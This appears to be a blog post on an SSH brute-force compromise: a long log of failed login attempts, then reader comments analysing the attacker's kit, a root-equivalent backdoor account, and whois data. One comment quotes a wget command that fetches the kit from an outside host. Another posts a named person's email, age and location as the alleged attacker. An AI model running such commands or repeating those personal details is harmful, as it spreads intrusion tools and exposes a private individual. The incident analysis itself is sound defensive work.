 Invalid user leon from 64.124.102.44
 Invalid user lex from 122.201.70.12
 Invalid user lia from 64.124.102.44
 Invalid user lidia from 64.124.102.44
 Invalid user lina from 64.124.102.44
 Invalid user ling from 122.201.70.12
 Invalid user linux from 64.124.102.44
 Invalid user lisa from 64.124.102.44
 Invalid user lorena123 from 64.124.102.44
 Invalid user lorena from 64.124.102.44
 Invalid user lqs from 64.124.102.44
 Invalid user lqsym from 64.124.102.44
 Invalid user luis from 64.124.102.44
 Invalid user luiza from 64.124.102.44
 Invalid user luiz from 64.124.102.44
 Invalid user magdalena from 64.124.102.44
 Invalid user mago123 from 64.124.102.44
 Invalid user mago321 from 64.124.102.44
 Invalid user mago from 64.124.102.44
 Invalid user magomago from 64.124.102.44
 Invalid user mailman from 64.124.102.44
 Invalid user mailnull123 from 64.124.102.44
 Invalid user mailnull321 from 64.124.102.44
 Invalid user mailnull from 64.124.102.44
 Invalid user mailscanner from 64.124.102.44
 Invalid user mails from 64.124.102.44
 Invalid user maison from 64.124.102.44
 Invalid user manager from 64.124.102.44
 Invalid user manuel from 64.124.102.44
 Invalid user manuelle from 64.124.102.44
 Invalid user mara from 64.124.102.44
 Invalid user marc from 64.124.102.44
 Invalid user marcos from 64.124.102.44
 Invalid user maria123 from 64.124.102.44
 Invalid user maria321 from 64.124.102.44
 Invalid user maria from 64.124.102.44
 Invalid user market from 64.124.102.44
 Invalid user martin123 from 64.124.102.44
 Invalid user martin321 from 64.124.102.44
 Invalid user martin from 64.124.102.44
 Invalid user master from 64.124.102.44
 Invalid user masterpost from 64.124.102.44
 Invalid user matt123 from 64.124.102.44
 Invalid user matt321 from 64.124.102.44
 Invalid user matt from 64.124.102.44
 Invalid user matthew from 64.124.102.44
 Invalid user mauricio from 64.124.102.44
 Invalid user maverick from 122.201.70.12
 Invalid user max123 from 64.124.102.44
 Invalid user max321 from 64.124.102.44
 Invalid user max from 64.124.102.44
 Invalid user maxmax from 64.124.102.44
 Invalid user mex from 64.124.102.44
 Invalid user mexico from 64.124.102.44
 Invalid user mexi from 64.124.102.44
 Invalid user mexmex from 64.124.102.44
 Invalid user mexschool from 64.124.102.44
 Invalid user michael123 from 64.124.102.44
 Invalid user michael from 64.124.102.44
 Invalid user michel from 64.124.102.44
 Invalid user michelle from 64.124.102.44
 Invalid user mick from 122.201.70.12
 Invalid user micor from 122.201.70.12
 Invalid user micro from 122.201.70.12
 Invalid user mike from 64.124.102.44
 Invalid user mike from 64.27.6.176
 Invalid user mikey from 64.124.102.44
 Invalid user mini from 122.201.70.12
 Invalid user miro from 64.124.102.44
 Invalid user modesto123 from 64.124.102.44
 Invalid user modesto321 from 64.124.102.44
 Invalid user modesto from 64.124.102.44
 Invalid user Monday44 from 64.124.102.44
 Invalid user Monday from 64.124.102.44
 Invalid user montreal from 64.124.102.44
 Invalid user morris from 64.124.102.44
 Invalid user morthy from 122.201.70.12
 Invalid user MOTOS from 64.124.102.44
 Invalid user mp3123 from 64.124.102.44
 Invalid user mp3 from 64.124.102.44
 Invalid user mp3mp3 from 64.124.102.44
 Invalid user mrtg123 from 64.124.102.44
 Invalid user mrtg1 from 64.124.102.44
 Invalid user mrtg2 from 64.124.102.44
 Invalid user mrtg3 from 64.124.102.44
 Invalid user mrtg from 64.124.102.44
 Invalid user music from 64.124.102.44
 Invalid user musiq from 64.124.102.44
 Invalid user musli from 122.201.70.12
 Invalid user mysql123 from 64.124.102.44
 Invalid user mysql from 64.124.102.44
 Invalid user mysql from 66.235.201.39
 Invalid user mysql from 75.126.69.5
 Invalid user nagios from 75.126.69.5
 Invalid user named from 64.124.102.44
 Invalid user name from 64.124.102.44
 Invalid user nameuser from 64.124.102.44
 Invalid user naric from 64.124.102.44
 Invalid user natalia from 64.124.102.44
 Invalid user nathan123 from 64.124.102.44
 Invalid user news123 from 64.124.102.44
 Invalid user newsnews from 64.124.102.44
 Invalid user nic from 64.124.102.44
 Invalid user nicholas from 64.124.102.44
 Invalid user nicole123 from 64.124.102.44
 Invalid user nicole321 from 64.124.102.44
 Invalid user nicole from 64.124.102.44
 Invalid user nina123 from 64.124.102.44
 Invalid user nina from 64.124.102.44
 Invalid user ninanina from 64.124.102.44
 Invalid user nistor from 64.124.102.44
 Invalid user nitro from 64.124.102.44
 Invalid user nobody123 from 64.124.102.44
 Invalid user nord from 122.201.70.12
 Invalid user novos from 64.124.102.44
 Invalid user nozama from 64.124.102.44
 Invalid user nsuser from 64.124.102.44
 Invalid user ntp123 from 64.124.102.44
 Invalid user ntp from 64.124.102.44
 Invalid user null from 64.124.102.44
 Invalid user nullmail from 64.124.102.44
 Invalid user ocean\tocean from 64.124.102.44
 Invalid user office from 64.124.102.44
 Invalid user oficina from 64.124.102.44
 Invalid user ofni from 64.124.102.44
 Invalid user ogam from 64.124.102.44
 Invalid user oinstall from 64.124.102.44
 Invalid user olga from 64.124.102.44
 Invalid user oliver from 64.124.102.44
 Invalid user olivier from 64.124.102.44
 Invalid user omni from 75.126.69.5
 Invalid user operator from 64.124.102.44
 Invalid user oracle123 from 64.124.102.44
 Invalid user oracle from 64.124.102.44
 Invalid user oracle from 75.126.69.5
 Invalid user order from 64.124.102.44
 Invalid user pam from 64.124.102.44
 Invalid user paolo from 64.124.102.44
 Invalid user paredes123 from 64.124.102.44
 Invalid user paredes321 from 64.124.102.44
 Invalid user paredes from 64.124.102.44
 Invalid user passwd from 64.124.102.44
 Invalid user password from 64.124.102.44
 Invalid user pasword from 64.124.102.44
 Invalid user patrick123 from 64.124.102.44
 Invalid user patrick321 from 64.124.102.44
 Invalid user patrick from 64.124.102.44
 Invalid user paul123 from 64.124.102.44
 Invalid user paul321 from 64.124.102.44
 Invalid user paula from 64.124.102.44
 Invalid user paul from 64.124.102.44
 Invalid user paulo from 64.124.102.44
 Invalid user pay from 64.124.102.44
 Invalid user paymaster from 64.124.102.44
 Invalid user payment from 64.124.102.44
 Invalid user payments from 64.124.102.44
 Invalid user paypal from 64.124.102.44
 Invalid user pcesar from 64.124.102.44
 Invalid user pecas from 64.124.102.44
 Invalid user peggy\tpeggy from 64.124.102.44
 Invalid user pessoal from 64.124.102.44
 Invalid user pgomes from 64.124.102.44
 Invalid user pgsql123 from 64.124.102.44
 Invalid user pgsql from 64.124.102.44
 Invalid user philipe from 64.124.102.44
 Invalid user pics from 64.124.102.44
 Invalid user plant from 213.197.182.48
 Invalid user plasma from 213.197.182.48
 Invalid user plcmspip from 75.126.69.5
 Invalid user PlcmSpIp from 75.126.69.5
 Invalid user plesk-root from 62.149.203.228
 Invalid user plokm from 64.124.102.44
 Invalid user pmok from 64.124.102.44
 Invalid user polycom from 75.126.69.5
 Invalid user poq from 64.124.102.44
 Invalid user postfix from 64.124.102.44
 Invalid user postfix from 75.126.69.5
 Invalid user post from 64.124.102.44
 Invalid user postgres from 64.124.102.44
 Invalid user PostgreSQL from 64.124.102.44
 Invalid user postmaster123 from 64.124.102.44
 Invalid user postmaster321 from 64.124.102.44
 Invalid user postmaster from 64.124.102.44
 Invalid user power from 64.124.102.44
 Invalid user powers from 64.124.102.44
 Invalid user printer from 64.124.102.44
 Invalid user prueba from 64.124.102.44
 Invalid user pussycat from 64.124.102.44
 Invalid user pussy from 64.124.102.44
 Invalid user pyramid from 64.124.102.44
 Invalid user pysco123 from 64.124.102.44
 Invalid user pysco from 64.124.102.44
 Invalid user q1w2e3r4 from 64.124.102.44
 Invalid user q1w2e3r4t5 from 64.124.102.44
 Invalid user q1w2e3r4t5y6 from 64.124.102.44
 Invalid user qaz from 64.124.102.44
 Invalid user qazxsw from 64.124.102.44
 Invalid user qpalzm from 64.124.102.44
 Invalid user qpwoeiru from 64.124.102.44
 Invalid user queen from 64.124.102.44
 Invalid user qwer1234 from 64.124.102.44
 Invalid user qwer from 64.124.102.44
 Invalid user qwert from 64.124.102.44
 Invalid user qwerty from 64.124.102.44
 Invalid user qwpoeriuty from 64.124.102.44
 Invalid user r00t123 from 64.124.102.44
 Invalid user r00t from 64.124.102.44
 Invalid user r0x1ng from 64.124.102.44
 Invalid user rachafi123 from 64.124.102.44
 Invalid user rachafi321 from 64.124.102.44
 Invalid user rachafi from 64.124.102.44
 Invalid user radio from 64.124.102.44
 Invalid user radmin from 75.126.69.5
 Invalid user rafael from 64.124.102.44
 Invalid user raisa from 64.124.102.44
 Invalid user rauleli from 64.124.102.44
 Invalid user raul from 64.124.102.44
 Invalid user ray from 64.124.102.44
 Invalid user rcp from 64.124.102.44
 Invalid user rebeca from 64.124.102.44
 Invalid user recepcao from 64.124.102.44
 Invalid user redhat from 64.124.102.44
 Invalid user regina from 64.124.102.44
 Invalid user remus from 64.124.102.44
 Invalid user reseller01 from 64.124.102.44
 Invalid user reseller02 from 64.124.102.44
 Invalid user reseller from 64.124.102.44
 Invalid user rewt from 64.124.102.44
 Invalid user richard123 from 64.124.102.44
 Invalid user richard321 from 64.124.102.44
 Invalid user richard from 64.124.102.44
 Invalid user riche from 64.124.102.44
 Invalid user rich from 64.124.102.44
 Invalid user ricky123 from 64.124.102.44
 Invalid user ricky321 from 64.124.102.44
 Invalid user ricky from 64.124.102.44
 Invalid user rita from 64.124.102.44
 Invalid user ro0tTri!10biteS from 64.124.102.44
 Invalid user robert from 64.124.102.44
 Invalid user rocco from 122.201.70.12
 Invalid user rocket from 64.124.102.44
 Invalid user rock from 64.124.102.44
 Invalid user rocky from 122.201.70.12
 Invalid user roco from 122.201.70.12
 Invalid user roger from 64.124.102.44
 Invalid user romeo from 64.124.102.44
 Invalid user ron123 from 64.124.102.44
 Invalid user ronald123 from 64.124.102.44
 Invalid user ronald from 64.124.102.44
 Invalid user root123456 from 64.124.102.44
 Invalid user root12345 from 64.124.102.44
 Invalid user root1234 from 64.124.102.44
 Invalid user root123 from 64.124.102.44
 Invalid user root321 from 64.124.102.44
 Invalid user rooter from 64.124.102.44
 Invalid user rootest from 64.124.102.44
 Invalid user ROOT from 64.124.102.44
 Invalid user rossy123 from 64.124.102.44
 Invalid user rossy321 from 64.124.102.44
 Invalid user rossy from 64.124.102.44
 Invalid user rossyrossy from 64.124.102.44
 Invalid user rotciv from 64.124.102.44
 Invalid user router from 64.124.102.44
 Invalid user roza from 64.124.102.44
 Invalid user rpcuser123 from 64.124.102.44
 Invalid user rpcuser from 64.124.102.44
 Invalid user rpm123 from 64.124.102.44
 Invalid user rpm from 64.124.102.44
 Invalid user rpmrpm from 64.124.102.44
 Invalid user rudolf from 64.124.102.44
 Invalid user ryan123 from 64.124.102.44
 Invalid user ryan from 64.124.102.44
 Invalid user saito from 213.197.182.48
 Invalid user sale from 64.124.102.44
 Invalid user sales123 from 64.124.102.44
 Invalid user sales321 from 64.124.102.44
 Invalid user sales from 64.124.102.44
 Invalid user sandra123 from 64.124.102.44
 Invalid user sandra321 from 64.124.102.44
 Invalid user sandra from 64.124.102.44
 Invalid user sara123 from 64.124.102.44
 Invalid user sara321 from 64.124.102.44
 Invalid user sara from 64.124.102.44
 Invalid user sarah from 64.124.102.44
 Invalid user sarasara from 64.124.102.44
 Invalid user schimitt from 64.124.102.44
 Invalid user school123 from 64.124.102.44
 Invalid user school from 64.124.102.44
 Invalid user script123 from 64.124.102.44
 Invalid user script from 64.124.102.44
 Invalid user scriptscript from 64.124.102.44
 Invalid user secret from 64.124.102.44
 Invalid user secrets from 64.124.102.44
 Invalid user secure from 64.124.102.44
 Invalid user selena from 64.124.102.44
 Invalid user semp from 122.201.70.12
 Invalid user sergio from 64.124.102.44
 Invalid user server123 from 64.124.102.44
 Invalid user server from 64.124.102.44
 Invalid user service from 75.126.69.5
 Invalid user sex from 64.124.102.44
 Invalid user sharon from 64.124.102.44
 Invalid user shell from 75.126.69.5
 Invalid user shop123 from 64.124.102.44
 Invalid user shop from 64.124.102.44
 Invalid user shopping from 64.124.102.44
 Invalid user shutdown123 from 64.124.102.44
 Invalid user shutdown from 64.124.102.44
 Invalid user shutdownshutdown from 64.124.102.44
 Invalid user silvia from 64.124.102.44
 Invalid user simon123 from 64.124.102.44
 Invalid user simon321 from 64.124.102.44
 Invalid user simon from 122.201.70.12
 Invalid user simon from 64.124.102.44
 Invalid user simpleit from 122.201.70.12
 Invalid user simpson from 64.124.102.44
 Invalid user sistem from 64.124.102.44
 Invalid user smchoi from 64.124.102.44
 Invalid user smith from 64.124.102.44
 Invalid user sophie from 64.124.102.44
 Invalid user spain from 64.124.102.44
 Invalid user spress from 64.124.102.44
 Invalid user sql123 from 64.124.102.44
 Invalid user sql from 64.124.102.44
 Invalid user sqlmy from 64.124.102.44
 Invalid user sqlpostgres from 64.124.102.44
 Invalid user sqlsql from 64.124.102.44
 Invalid user stephen123 from 64.124.102.44
 Invalid user stephen321 from 64.124.102.44
 Invalid user stephen from 64.124.102.44
 Invalid user steve from 64.124.102.44
 Invalid user steven123 from 64.124.102.44
 Invalid user steven321 from 64.124.102.44
 Invalid user steven from 64.124.102.44
 Invalid user stewart from 64.124.102.44
 Invalid user stims1 from 64.124.102.44
 Invalid user stims\tstims from 64.124.102.44
 Invalid user student from 64.124.102.44
 Invalid user sunday from 64.124.102.44
 Invalid user Sunday from 64.124.102.44
 Invalid user suva123 from 64.124.102.44
 Invalid user suva321 from 64.124.102.44
 Invalid user suva from 64.124.102.44
 Invalid user suzana from 64.124.102.44
 Invalid user suzuki from 75.126.69.5
 Invalid user svn from 75.126.69.5
 Invalid user swen from 64.124.102.44
 Invalid user sync123 from 64.124.102.44
 Invalid user system123 from 64.124.102.44
 Invalid user system321 from 64.124.102.44
 Invalid user system from 64.124.102.44
 Invalid user takayama123 from 64.124.102.44
 Invalid user takayama321 from 64.124.102.44
 Invalid user takayama from 64.124.102.44
 Invalid user tanaka123 from 64.124.102.44
 Invalid user tanaka from 64.124.102.44
 Invalid user tanakatanaka from 64.124.102.44
 Invalid user teamspeak from 75.126.69.5
 Invalid user TeamSpeak from 75.126.69.5
 Invalid user tech123 from 64.124.102.44
 Invalid user tech from 64.124.102.44
 Invalid user techtech123 from 64.124.102.44
 Invalid user techtech from 64.124.102.44
 Invalid user telmo from 64.124.102.44
 Invalid user temp from 64.124.102.44
 Invalid user temp from 75.126.69.5
 Invalid user ten from 122.201.70.12
 Invalid user test12345 from 64.124.102.44
 Invalid user test123 from 64.124.102.44
 Invalid user test1 from 122.201.70.12
 Invalid user test1 from 64.124.102.44
 Invalid user test1test1 from 64.124.102.44
 Invalid user test2 from 122.201.70.12
 Invalid user test2 from 64.124.102.44
 Invalid user test2res from 64.124.102.44
 Invalid user test3 from 64.124.102.44
 Invalid user test4 from 64.124.102.44
 Invalid user test5 from 64.124.102.44
 Invalid user test6 from 64.124.102.44
 Invalid user test7 from 64.124.102.44
 Invalid user test8 from 64.124.102.44
 Invalid user test9 from 64.124.102.44
 Invalid user tester from 64.124.102.44
 Invalid user testertester from 64.124.102.44
 Invalid user testest from 64.124.102.44
 Invalid user test from 122.201.70.12
 Invalid user test from 64.124.102.44
 Invalid user test from 75.126.69.5
 Invalid user testing from 64.124.102.44
 Invalid user testmail from 64.124.102.44
 Invalid user testrese from 64.124.102.44
 Invalid user testroot from 64.124.102.44
 Invalid user testtest123 from 64.124.102.44
 Invalid user testtest from 64.124.102.44
 Invalid user testuser from 64.124.102.44
 Invalid user testuser from 75.126.69.5
 Invalid user theo123 from 64.124.102.44
 Invalid user theo from 64.124.102.44
 Invalid user thomas123 from 64.124.102.44
 Invalid user thomas321 from 64.124.102.44
 Invalid user thomas from 122.201.70.12
 Invalid user thomas from 64.124.102.44
 Invalid user tia123 from 64.124.102.44
 Invalid user tia321 from 64.124.102.44
 Invalid user tia from 64.124.102.44
 Invalid user tiatia from 64.124.102.44
 Invalid user tigerclaw from 64.124.102.44
 Invalid user tmp1 from 64.124.102.44
 Invalid user tomcat123 from 64.124.102.44
 Invalid user tomcat4 from 64.124.102.44
 Invalid user tomcat from 64.124.102.44
 Invalid user tom from 64.124.102.44
 Invalid user tom from 75.126.69.5
 Invalid user toor from 122.201.70.12
 Invalid user tracy from 61.133.208.210
 Invalid user travel from 64.124.102.44
 Invalid user trial from 64.124.102.44
 Invalid user ts from 75.126.69.5
 Invalid user tyler\ttyler from 64.124.102.44
 Invalid user ueda from 213.197.182.48
 Invalid user universal from 64.124.102.44
 Invalid user unix from 75.126.69.5
 Invalid user unreal from 64.124.102.44
 Invalid user upload123 from 64.124.102.44
 Invalid user upload321 from 64.124.102.44
 Invalid user upload from 64.124.102.44
 Invalid user usa from 64.124.102.44
 Invalid user user01 from 64.124.102.44
 Invalid user user02 from 64.124.102.44
 Invalid user user1 from 64.124.102.44
 Invalid user user2 from 64.124.102.44
 Invalid user user3 from 64.124.102.44
 Invalid user user4 from 64.124.102.44
 Invalid user user5 from 64.124.102.44
 Invalid user user from 64.124.102.44
 Invalid user user from 75.126.69.5
 Invalid user username123 from 64.124.102.44
 Invalid user username321 from 64.124.102.44
 Invalid user username from 64.124.102.44
 Invalid user usertest from 64.124.102.44
 Invalid user usr from 64.124.102.44
 Invalid user uucp123 from 64.124.102.44
 Invalid user uucpuucp from 64.124.102.44
 Invalid user valentin from 64.124.102.44
 Invalid user vamalc from 64.124.102.44
 Invalid user vanessa123 from 64.124.102.44
 Invalid user vanessa321 from 64.124.102.44
 Invalid user vanessa from 64.124.102.44
 Invalid user var from 64.124.102.44
 Invalid user vcsa123 from 64.124.102.44
 Invalid user vcsa from 64.124.102.44
 Invalid user vendas from 64.124.102.44
 Invalid user ventas from 64.124.102.44
 Invalid user vera from 64.124.102.44
 Invalid user vicar from 122.201.70.12
 Invalid user victor123 from 64.124.102.44
 Invalid user victor321 from 64.124.102.44
 Invalid user victor from 64.124.102.44
 Invalid user video from 64.124.102.44
 Invalid user violeta from 64.124.102.44
 Invalid user virtuoso123 from 64.124.102.44
 Invalid user virtuoso321 from 64.124.102.44
 Invalid user virtuoso from 64.124.102.44
 Invalid user virusalert from 75.126.69.5
 Invalid user vivian123 from 64.124.102.44
 Invalid user vivian321 from 64.124.102.44
 Invalid user vivian from 64.124.102.44
 Invalid user vivi from 64.124.102.44
 Invalid user vox from 64.124.102.44
 Invalid user walter from 64.124.102.44
 Invalid user wayne\twayne from 64.124.102.44
 Invalid user web1 from 64.124.102.44
 Invalid user web2 from 64.124.102.44
 Invalid user webadmin123 from 64.124.102.44
 Invalid user webadmin321 from 64.124.102.44
 Invalid user webadmin from 64.124.102.44
 Invalid user webadmin from 75.126.69.5
 Invalid user webchat from 64.124.102.44
 Invalid user webdesign from 64.124.102.44
 Invalid user webdev from 64.124.102.44
 Invalid user web from 64.124.102.44
 Invalid user webhost from 64.124.102.44
 Invalid user weblogic from 64.124.102.44
 Invalid user webmail from 64.124.102.44
 Invalid user webmaster from 64.124.102.44
 Invalid user website from 64.124.102.44
 Invalid user weed from 64.124.102.44
 Invalid user wembley from 122.201.70.12
 Invalid user whiteangel from 64.124.102.44
 Invalid user white from 64.124.102.44
 Invalid user william123 from 64.124.102.44
 Invalid user william321 from 64.124.102.44
 Invalid user william from 64.124.102.44
 Invalid user wilson from 64.124.102.44
 Invalid user windows from 64.124.102.44
 Invalid user worthy from 122.201.70.12
 Invalid user www123 from 64.124.102.44
 Invalid user www from 64.124.102.44
 Invalid user www from 66.235.201.39
 Invalid user www from 75.126.69.5
 Invalid user wwwrun from 64.124.102.44
 Invalid user xam from 64.124.102.44
 Invalid user xbitchx from 64.124.102.44
 Invalid user xchat from 64.124.102.44
 Invalid user xfs123 from 64.124.102.44
 Invalid user xfs from 64.124.102.44
 Invalid user ydnah from 64.124.102.44
 Invalid user yoshida123 from 64.124.102.44
 Invalid user yoshida321 from 64.124.102.44
 Invalid user yoshida from 64.124.102.44
 Invalid user yssor from 64.124.102.44
 Invalid user z1x2c3 from 64.124.102.44
 Invalid user zabbix from 75.126.69.5
 Invalid user zachary from 64.124.102.44
 Invalid user zoe from 64.124.102.44
 Invalid user zuperman from 64.124.102.44
 Invalid user zxcvb from 64.124.102.44
 Invalid user zxcvbn from 64.124.102.44

Comments (42) Trackbacks (2)
  1. The ip addresses are probably victims. My guess is (s)he’s turning the box into another zombie which he/she can then use to attack others

  2. Yeah, you may be right about that. It seems odd that it’s such a small, geographically limited list. I checked one of them and it’s from Malaysia. I’ve thought that it may also be IPs that it will take orders from?

  3. Best guess on the ip address is sending something back to momma
    in australia

    http://samspade.org/whois/211.27.148.92

    inetnum: 211.26.0.0 – 211.27.255.255
    netname: INTERNETPRIMUS
    descr: Primus Telecommunications
    descr: Internet Services Network
    country: AU
    admin-c: jp21-ap
    tech-c: rc35-ap
    mnt-by: APNIC-HM
    mnt-lower: MAINT-PRIMUS-AU
    status: ALLOCATED PORTABLE
    remarks: —————————–
    remarks: This object can only be modified by APNIC hostmaster
    remarks: If you wish to modify this object details please
    remarks: send email to hostmaster@apnic.net
    with your organisation
    remarks: account name in the subject line.
    remarks: —————————–
    changed: hm-changed@apnic.net
    20030930
    source: APNIC
    person: Jeff Pace
    nic-hdl: JP21-AP
    e-mail: netops@primus.com.au

    address: L3 1 Alfred Street
    address: Circular Quay
    address: Sydney NSW Australia
    address: 2000
    phone: 61-2-9423 2400
    fax-no: 61-2-9423 2410
    country: AU
    changed: netops@primus.com.au
    20030724
    mnt-by: MAINT-PRIMUS-AU
    source: APNIC
    person: Richard Coombe
    nic-hdl: RC35-AP
    e-mail: netops@primus.com.au

    Level 3 is the sysop/network

  4. Just had one of our customers hit by the exact same kit. Seems they go around and search for weak root passwords.

    Attacker’s IP: 92.84.130.255
    The machine responsible for attacking the VPS in the first place is: 91.135.235.130

  5. Hrm, auto formatting. Lets try that usage line again…

    usage: %s <port> [-a <a class> | -b <b class>] [-i <interface] [-s <speed>]
    speed 10 -> as fast as possible, 1 -> it will take bloody ages (about 50 syns/s)

  6. @James – That first IP appears to be from Romania, and the second from UK. I suppose at least one of those are other compromised machines?

    @Kenny – Thanks for the insight on those IPs. I don’t quite understand where those particular IPs are coming from. Just a random assortment of new targets running ssh? I tried using a reverse DNS lookup on a few of them, but it was unsuccessful.

  7. A network/port scanner is like a brute forcer or wardialer for network services. This scanner was pointed at the 211 class-A and tried connecting to every IP (211.*.*.*) on port 22. The IP addresses listed are the hosts that answered. They were targets for the attacks coming from your host, but not yet victims. If you had any entries in vuln.txt, then you would have victims to notify. (Contents could have been removed.) The IP’s are all over the apnic map: China, Taiwan, Malaysia, Australia, and Korea.

    AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
    9808 | 211.140.242.87 | 211.140.192.0/18 | CN | apnic | 2000-08-18 | CMNET-GD Guangdong Mobile Communication Co.Ltd.
    3462 | 211.20.141.33 | 211.20.0.0/16 | TW | apnic | 2000-06-30 | HINET Data Communication Business Group
    9930 | 211.24.143.103 | 211.24.128.0/17 | MY | apnic | 2002-10-24 | TTNET-MY TIME DOTCOM BERHAD
    9443 | 211.27.148.70 | 211.27.144.0/20 | AU | apnic | 2003-09-30 | INTERNETPRIMUS-AS-AP Primus Telecommunications
    9318 | 211.33.112.228 | 211.33.0.0/17 | KR | apnic | 1999-08-27 | HANARO-AS Hanaro Telecom Inc.
    15412 | 211.43.150.141 | 211.43.150.0/24 | KR | apnic | 1999-11-18 | FLAG-AS Flag Telecom Global Internet AS

    Oh, and as for why they changed your password, the script kiddies MO is “own more stuff than the other guy.” If they share, then some one else is likely to get the attention of the admin and spoil fun. So they plug obvious holes, like the one they got in through. Generally speaking, an admin who isn’t present enough to change a default password won’t notice if it gets changed for them.

  8. screen is a terminal multiplexer, ssh to a server, type ‘screen’ and you can have multiple ‘sessions’ although you’ve only logged in once. (That’s not the most accurate description but once you try it out, you’ll understand…it’s pretty awesome.)

    It was probably somebody who got really lucky and was just typing stuff they saw on some website, hence the typo (and the reason for changing the password). As you noted, someone less careless would have been more difficult to detect.

  9. Thanks for your comment Ashley. I’m actually familiar with screen, but what I wasn’t sure about was whether screen logged its commands to .bash_history. It turns out it doesn’t (or at least not the way things are configured on my machine). So that may explain why certain files appeared on my machine, with no reference in the history as to how they got there.

    I agree with you though, this was probably just the work of a script kiddie — I almost certainly wouldn’t have caught it (or at least not for a much longer time) if it was the work of someone more experienced.

  10. You can get these files from this address
    wget adelinuangell.lx.ro/cote/go.tar
    This guy access my computer , and log some commands to .bash_history.
    I find this address from .bash_history.
    Screen is a utils to remove log information from wtmp/utmp, i think so.

  11. Yeah just got hit with the same thing less than 24 hours after getting a new VPS. Some details I found:

    found /var/tmp/war2010

    with these files:

    drwx—— 2 501 501 4096 Aug 29 18:26 .
    drwxrwxrwt 3 root root 4096 Aug 29 20:04 ..
    -rwx–x–x 1 501 501 680 Jan 28 2010 a
    -rwxr-xr-x 1 501 501 0 Jan 13 2010 nobash.txt
    -rwx–x–x 1 501 501 12639 Aug 29 18:21 pass.txt
    -rwx–x–x 1 501 501 11464 May 16 2005 pscan2
    -rwxr-xr-x 1 501 501 249980 Feb 13 2001 screen
    -rwx–x–x 1 501 501 1384518 Jun 6 2005 sshd
    -rwxr-xr-x 1 501 501 2759 Jan 28 2010 start
    -rwxr-xr-x 1 501 501 0 Jan 7 2010 vuln.txt

    Appears to be brute force but then user Raul just logged in as root…?

    fh1:/var/log# grep -R raul *
    auth.log:Aug 29 07:47:15 fh1 sshd[1843]: Invalid user raul from 122.160.169.162
    auth.log:Aug 29 07:47:17 fh1 sshd[1843]: Failed password for invalid user raul from 122.160.169.162 port 56503 ssh2
    auth.log:Aug 29 15:11:47 fh1 useradd[26172]: new group: name=raul, GID=1011
    auth.log:Aug 29 15:11:47 fh1 useradd[26172]: new user: name=raul, UID=0, GID=1011, home=/home/raul, shell=/bin/sh
    auth.log:Aug 29 15:11:58 fh1 passwd[26190]: pam_unix(passwd:chauthtok): password changed for raul
    auth.log:Aug 29 15:13:43 fh1 sshd[28273]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94-195-119-17.zone9.bethere.co.uk user=raul
    auth.log:Aug 29 15:13:45 fh1 sshd[28273]: Failed password for raul from 94.195.119.17 port 2519 ssh2
    auth.log:Aug 29 15:13:57 fh1 sshd[28273]: Accepted password for raul from 94.195.119.17 port 2519 ssh2
    auth.log:Aug 29 15:13:57 fh1 sshd[28273]: pam_unix(sshd:session): session opened for user raul by (uid=0)
    auth.log.0:Aug 28 17:09:55 fh1 sshd[32053]: Invalid user raul from 222.122.163.116
    auth.log.0:Aug 28 17:09:57 fh1 sshd[32053]: Failed password for invalid user raul from 222.122.163.116 port 44453 ssh2
    auth.log.0:Aug 28 17:13:08 fh1 sshd[9559]: Invalid user raul from 222.122.163.116
    auth.log.0:Aug 28 17:13:11 fh1 sshd[9559]: Failed password for invalid user raul from 222.122.163.116 port 48574 ssh2
    mail.info:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBIqRT005603: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:02:10, xdelay=00:00:00, mailer=relay, pri=1020535, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    mail.info:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBHq39003999: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:03:10, xdelay=00:00:00, mailer=relay, pri=1022653, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    mail.log:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBIqRT005603: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:02:10, xdelay=00:00:00, mailer=relay, pri=1020535, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    mail.log:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBHq39003999: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:03:10, xdelay=00:00:00, mailer=relay, pri=1022653, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    rkhunter.log:[18:22:33] Warning: Account ‘raul’ is root equivalent (UID = 0)

    From email address found this info:

    http://www.wayn.com/profiles/raul2704raul2704@yahoo.com

    Raul Lonzaga
    Gender : male
    Age : 39
    Nationality : Filipino
    Location :
    North Cotabato, Philippines
    Last login : 29th August 2010

  12. Thanks for the additional info.

  13. Give kippo-honepot a go http://code.google.com/p/kippo/ Its a ssh-honeypot. Very simple but very effective. I have caught the very same gosh.tgz that way

  14. lol, that’s a really cool-looking program, thanks!

  15. That is a ssh brute force scanner and is quite common in the script kiddies group. The bad thing about it is that is used to scan an entire IP class (noticed ./ss -a) , the attacker has scanned 211.*.*.* and this on a machine without a good processor/s can crash the linux machine in few seconds.

    mfu.txt is the list of the IP’s sorter for duplicate entries .
    pscan2 is a scan binary used to use scanner from a nonroot user since ./ss can be used only by uid0 user.

    As usual this is a normal behaveur of linux kiddies , they got some shits like this and are ruining peoples PC.
    As far as i know there is a new hacking report service at http://rep.hack-report.info , they are new in business but are doing a good work , once your site is reported as attacked and a log is submited they are reporting the attacker to local authorities from any country the attacker could be , in your case i am sorry to announce that attacker is from my country : Romania , i know that because i personaly have investigated some attack’s and i have found this scanner.

  16. Excellent info, thanks.

  17. I have seen thousands of these attacks, and was so annoyed a watching my logs fill up with rubbish, I wrote a linux service to monitor syslog, gather the evidence, ban the ip address with iptables, get the abuse address responsible for the ip address and sent a mail notifying them that one of their machines is owned, after checking a do-not-mail list of delinquent ISPs.
    In many cases the mails are ignored, bounce or defer (which are then added to the do-not-mail db) but some are actually read and acted upon, and some compromised machines do get fixed, and sometimes even with a thank you note, which really does make the 100,000+ messages I have sent worthwhile.

    The ip addresses go into a database, currently 1.25 million rows, each containing the date of the last ten times seen, ban type, status and how many times banned. They are linked to another table containing the evidence.

